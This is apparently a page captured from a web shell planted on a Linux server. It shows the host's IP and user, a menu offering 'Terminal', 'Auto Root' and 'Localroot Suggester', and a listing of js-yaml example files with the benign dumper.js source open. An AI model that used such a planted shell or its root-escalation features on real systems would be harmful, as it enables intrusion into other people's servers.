Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
node-js-yaml /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
custom_types.js
2.96
KB
-rw-r--r--
2021-04-14 21:04
custom_types.yml
292
B
-rw-r--r--
2021-04-14 21:04
dumper.js
619
B
-rw-r--r--
2021-04-14 21:04
dumper.json
422
B
-rw-r--r--
2021-04-14 21:04
handle_unknown_types.js
1.21
KB
-rw-r--r--
2021-04-14 21:04
int_type_override.js
1.26
KB
-rw-r--r--
2021-04-14 21:04
sample_document.js
427
B
-rw-r--r--
2021-04-14 21:04
sample_document.yml
4.74
KB
-rw-r--r--
2021-04-14 21:04
Save
Rename
'use strict'; /*eslint-disable no-console*/ var yaml = require('../'); var object = require('./dumper.json'); console.log(yaml.dump(object, { flowLevel: 3, styles: { '!!int' : 'hexadecimal', '!!null' : 'camelcase' } })); // Output: //============================================================================== // name: Wizzard // level: 0x11 // sanity: Null // inventory: // - name: Hat // features: [magic, pointed] // traits: {} // - name: Staff // features: [] // traits: {damage: 0xA} // - name: Cloak // features: [old] // traits: {defence: 0x0, comfort: 0x3}